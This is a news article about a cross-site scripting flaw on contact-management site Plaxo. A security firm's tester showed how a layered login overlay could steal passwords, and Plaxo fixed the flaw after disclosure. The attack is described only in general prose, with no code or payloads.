Plaxo plugs phishing vulnerability

Plaxo has plugged a gaping security hole in its Web site that could have exposed its members' online address books

Online contacts management company Plaxo plugged a serious security hole in its Web site on Monday that left its members' contact lists vulnerable to be stolen, modified or deleted.

With more than two million users, Plaxo is one of the most popular online address book companies. It stores its members' contacts in a central database and provides access to them over the Internet. The service allows its members to invite contacts to update their own information, helpings users keep their address books up to date.

The security flaw, which was discovered by Web application security company Lodoga, was reported to Plaxo on Monday evening.  Lodoga's security test engineer Jeremy Wood told ZDNet UK it took him less than an hour after discovering the weakness to build an attack script that could exploit the vulnerability.

Wood demonstrated the attack script to ZDNet UK. Using the live Plaxo Web site, Wood's script added an additional layer over the username and password box. With this layer in place, if a user typed in their access details, the information would first be sent to the attacker's Web site and then to Plaxo to log the user in. Users would have had no idea their details had been taken.

"We are using a vulnerable field on the front page of Plaxo to specifically overlay their user ID form with something called a 'Div' -- a Javascript element that is a layer. If you place a layer on top of a Web page, you can colour it the same and make it present the same information," said Wood.

Wood explained that because the additional layer was being placed over the actual Plaxo Web site, its members would not be able to tell the difference, even though the site was connected over SSL. Clicking on the padlock displayed on the browser would show the Web site as genuine despite its modification.

Plaxo's service is an ideal target for phishers. Any fraud would probably be delivered in the same way that criminals target bank customers, by sending a user an email asking them to click on a specially crafted hyperlink that would lead them to a doctored page.  Banks can tell their customers to ignore such emails, but Plaxo's users need to send and receive emails to invite contacts to click on a link and update their details.

"The whole Plaxo environment is built around trust and sharing information, and you have seen how easily emails can be spoofed. This attack is designed to create victims, but more importantly, not allow them to know they have become victims," said Wood.

Rikk Carey, vice president of engineering at Plaxo, told ZDNet UK that the Web site was fixed a few hours after the problem was highlighted and he was "fairly certain" that the vulnerability had not been exploited by anyone except Lodoga's security testing.

"It required the evildoer to trick the victim into clicking on a URL controlled by the evildoer. This URL adds some extra HTML to the target Web site (and thus is actually happening on the target Web site, such as which can be used to steal the victim's password. The fix was minor and has been deployed," he said.

According to Lodoga's Wood, there are a large number of Web sites that have not programmed their databases to ensure that database records only accept information they are designed to collect. This will be a real headache for businesses such as Plaxo that require the promiscious exchange of emails between groups of contacts. 

"Plaxo is not alone. We have been running workshops this month and every client we deal with has the same problem. Developers haven't really realised how robust they have to be in terms of security coding. This is probably the number one problem, and companies really are jeopardising their trade name and potentially their customers' data," added Wood.

Russ Cooper, founder and moderator of the NTBugtraq Newsletter and surgeon general at security company TruSecure, told ZDNet UK that Plaxo had been caught making a classic scripting error: "You shouldn’t be able to put scripting code into something that asks you for a business title," he said.